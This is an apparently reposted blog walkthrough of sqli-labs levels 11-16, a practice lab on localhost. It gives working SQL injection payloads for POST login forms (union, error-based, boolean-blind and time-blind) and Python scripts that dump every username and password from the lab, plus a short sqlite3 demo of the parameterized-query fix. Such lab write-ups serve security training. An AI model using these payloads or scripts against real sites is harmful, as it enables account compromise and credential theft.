sqli-labs less11-16

LESS 11 String-based injection (POST)

Enter a single quote ' in the username field as a test. Result:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' and password='' LIMIT 0,1' at line 1

From this the query is presumably: select * from users where username='$username' and password='$password' LIMIT 0,1
So construct the payload:

Username : 0' union select group_concat(username),group_concat(password) from users#
Password :

Result:

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
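As an added example (not code from the original post), the Less 11 pattern reproduced offline with Python's sqlite3: the vulnerable login splices the form fields into the query text, so the union payload above comes back as one row holding every username and password, while the same query with bound parameters treats the whole payload as a literal username and finds nothing. The users table is a constructed subset of the rows shown above, and '#' is swapped for '-- ' because SQLite, unlike MySQL, does not treat '#' as a comment.

```python
import sqlite3

# Constructed subset of the sqli-labs users table, taken from the rows shown above.
USERS = [("Dumb", "Dumb"), ("Angelina", "I-kill-you"),
         ("Dummy", "p@ssword"), ("admin", "admin")]

# The page's Less 11 payload; '#' is MySQL-only, so SQLite's '-- ' comment is used here.
PAYLOAD = "0' union select group_concat(username),group_concat(password) from users-- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(id integer primary key, username text, password text)")
    conn.executemany("insert into users(username, password) values (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Mirrors Less 11: the form values are spliced into the SQL text, so a
    quote in username ends the literal and the rest is executed as SQL."""
    sql = (f"select username, password from users where username='{username}' "
           f"and password='{password}' limit 1")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver passes the payload as a
    string value, so the quote and UNION never reach the parser as SQL."""
    sql = ("select username, password from users where username=? "
           "and password=? limit 1")
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, PAYLOAD, ""))  # one row with every user and password
    print(login_safe(conn, PAYLOAD, ""))        # None: no user is literally named like that
```

The first select in the injected union matches no row (username '0'), so the only row returned is the aggregated one, which is exactly what the Less 11 page echoed back as "Your Login name" and "Your Password".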

LESS 12 Double-quote string-based injection (POST)

The difference from the previous level is that the string is wrapped in double quotes and parentheses, which can be read off the error message.
The payload is as follows:

Username : 0") union select group_concat(username),group_concat(password) from users#
Password :

LESS 13 Double-query injection (POST)

From the error message we know the string is wrapped in a pair of single quotes and a pair of parentheses, but a successful login displays no data; only error messages are shown. So use double-query (error-based) injection:

Username : 0') union select count(*), CONCAT_WS(CHAR(32,58,32),(select count(*) from users),floor(rand()*2)) as a from users group by a#
Password :

Result:

Duplicate entry '13 : 1' for key 'group_key'

A script can be written to dump the table. Note that the duplicate-key error only fires when floor(rand()*2) happens to collide in the GROUP BY, so a request that returns no error has to be repeated for the same row:

from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-13/"

i = 0
while i < 13:
    # Row i's username and password joined with " | " (CHAR(32,124,32)), plus the
    # floor(rand()*2) value whose collision triggers the duplicate-key error.
    data = {"uname": "0') union select count(*), CONCAT_WS(CHAR(32,124,32),"
                     "(select username from users limit " + str(i) + ",1),"
                     "(select password from users limit " + str(i) + ",1),"
                     "floor(rand()*2)) as a from users group by a#",
            "passwd": ""}
    response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
    # The leaked row sits inside "Duplicate entry '...' for key 'group_key'".
    info = re.search(r"Duplicate entry '([^']*)' for key", response)
    if info is None:
        # rand() did not collide this time; retry the same row.
        continue
    print(info.group(1))
    i += 1

Result:

Dumb | Dumb | 0
Angelina | I-kill-you | 1
Dummy | p@ssword | 0
secure | crappy | 1
stupid | stupidity | 1
superman | genious | 0
batman | mob!le | 1
admin | admin | 0
admin1 | admin1 | 0
admin2 | admin2 | 1
admin3 | admin3 | 1
dhakkan | dumbo | 1
admin4 | admin4 | 0

LESS 14 Double-quote double-query injection (POST)

Apart from replacing the single quote and parenthesis with a double quote, this is no different from the previous level. Payload:

Username : 0" union select count(*), CONCAT_WS(CHAR(32,58,32),(select count(*) from users),floor(rand()*2)) as a from users group by a#
Password :

Everything else is the same as Less 13.

LESS 15 Boolean-based blind injection (POST)

POST blind injection; take the script from Less 7 and adjust it:

from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-15/"


def ask(condition):
    # Send ' or <condition># as the username.  Less 15 shows slap.jpg on a
    # failed login, so 'slap' in the page means the condition was false.
    data = {"uname": "' or " + condition + "#", "passwd": ""}
    response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
    return re.search("slap", response) is None


def getLength(value):
    # Linear scan: test length(value)=0, =1, ... until the login succeeds.
    length = 0
    while not ask("length(" + value + ")=" + str(length)):
        length += 1
    return length


def getName(value):
    result = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        # Binary search on the ASCII value of character n+1: a is the current
        # guess and b the step, halved every round (32, 16, ..., 1, 0).
        while True:
            b = int(b / 2)
            if ask("ascii(substr(" + value + "," + str(n + 1) + "))<" + str(a)):
                a -= b            # character is below the guess
            elif ask("ascii(substr(" + value + "," + str(n + 1) + "))=" + str(a)):
                result += chr(a)  # guess is exact
                break
            else:
                a += b            # character is above the guess
    return result


print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))

The result is the same as Less 8.

LESS 16 Time-based blind injection (POST)

Combine the Less 9 script with a modified version of the previous level's script and you get the script for this level:

from urllib import request
from urllib import parse
import time

url = "http://localhost/sqli-labs-master/Less-16/"
delay = 0.1  # seconds the server sleeps when the condition is true; raise it on a slow link


def ask(condition):
    # Less 16 wraps uname in ("..."), so ") breaks out of it.  The page looks
    # the same either way; if(cond, sleep, 1) only sleeps when the condition holds.
    data = {"uname": '") or if(' + condition + ",sleep(" + str(delay) + "),1)#", "passwd": ""}
    t = time.time()
    request.urlopen(url, parse.urlencode(data).encode()).read()
    return time.time() - t > delay


def getLength(value):
    # Linear scan: test length(value)=0, =1, ... until the request is delayed.
    length = 0
    while not ask("length(" + value + ")=" + str(length)):
        length += 1
    return length


def getName(value):
    result = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        # Binary search on the ASCII value of character n+1: a is the current
        # guess and b the step, halved every round (32, 16, ..., 1, 0).
        while True:
            b = int(b / 2)
            if ask("ascii(substr(" + value + "," + str(n + 1) + "))<" + str(a)):
                a -= b            # character is below the guess
            elif ask("ascii(substr(" + value + "," + str(n + 1) + "))=" + str(a)):
                result += chr(a)  # guess is exact
                break
            else:
                a += b            # character is above the guess
    return result


print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))

It is too slow; I don't know of a good way to improve it.


https://soporbear.github.io/2018/05/29/sqli-labs-less11/

Reposted from blog.csdn.net/sopora/article/details/82981668